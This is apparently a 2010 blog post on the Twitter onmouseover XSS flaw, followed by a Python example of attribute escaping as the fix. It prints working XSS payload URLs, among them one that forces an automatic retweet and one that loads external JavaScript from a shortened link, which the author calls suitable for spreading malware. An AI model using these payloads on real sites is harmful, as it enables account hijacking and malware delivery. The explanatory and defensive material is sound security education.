Hi Folks,
as you probably know I am not used to writing about vulnerabilities, but the latest Twitter XSS vulnerability came in the middle of a vulnerability project I am working on. The argument was how it is still possible to have XSS vulnerabilities in 2010. My answer was, and still is: "Because programming is human". Humans make mistakes ... humans make bugs, and bugs eventually become vulnerabilities. So here it is: the latest Twitter vulnerability is a perfect and simple XSS injection due to poor input filtering.
This is the attack vector:
http://twitter.com/RainbowTwtr#@"onmouseover="javascript:alert('Hello World !');"/
When the mouse pointer goes over the tweet a classic "alert" pops up. Here we are: it's enough to view a tweet and you get exploited. Here are more examples:
http://twitter.com/RainbowTwtr#@"onmouseover="document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();"font-size:500pt;/
Automatic re-tweet submission.
http://twitter.com/RainbowTwtr#@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')'/
This is pretty nasty: it executes an external JavaScript file. This would be perfect for spreading malware :D !
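All three vectors work the same way: the tweet text is dropped into an HTML attribute, and the unescaped double quote in `@"onmouseover=` closes that attribute and opens a new event-handler attribute. The following Python snippet is an added illustration of that mechanism and of the fix (attribute-context output encoding); it is not Twitter's code and not part of the original post. The sample URL, the two `render_link_*` functions and the small HTML-parser check are all constructed here for the demonstration.

```python
from html import escape
from html.parser import HTMLParser

# Constructed sample input, modelled on the attack vector quoted in the post:
# a URL whose fragment contains a double quote followed by an event handler.
TWEET_URL = 'http://twitter.com/RainbowTwtr#@"onmouseover="alert(1)"/'


def render_link_naive(url: str) -> str:
    """Vulnerable: untrusted text is interpolated straight into an attribute."""
    return f'<a href="{url}">{url}</a>'


def render_link_escaped(url: str) -> str:
    """Hardened: encode & < > " ' before the text reaches the attribute."""
    safe = escape(url, quote=True)  # quote=True is what protects attributes
    return f'<a href="{safe}">{safe}</a>'


class AnchorAttrs(HTMLParser):
    """Records the attribute names a real HTML parser sees on <a> tags."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.attrs.extend(name for name, _ in attrs)


def anchor_attribute_names(html: str) -> list[str]:
    """Parse the rendered markup and return the attribute names on <a>."""
    parser = AnchorAttrs()
    parser.feed(html)
    parser.close()
    return parser.attrs


def has_event_handler(html: str) -> bool:
    """True if the parser produced any on* attribute (onmouseover etc.)."""
    return any(name.startswith("on") for name in anchor_attribute_names(html))


if __name__ == "__main__":
    for label, render in (("naive", render_link_naive), ("escaped", render_link_escaped)):
        markup = render(TWEET_URL)
        print(f"{label:8} {markup}")
        print(f"{'':8} attributes seen by parser: {anchor_attribute_names(markup)}")
        print(f"{'':8} event handler injected:    {has_event_handler(markup)}")
```

Running it shows the naive rendering yields an `<a>` element carrying an `onmouseover` attribute, while the escaped rendering yields a single `href` attribute whose value merely contains `&quot;`. The check is done with a parser rather than string matching on purpose: what matters for XSS is the DOM the browser builds, not what the raw string looks like.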
Another interesting demonstration comes from Sophos Labs.
Again, no one is immune to bugs, so please remember the importance of penetration testing, which is the only holistic way to find vulnerabilities.
"The system administrator needs to figure out all the possible bugs to protect his system. The attacker needs to find out only one bug to compromise the entire system"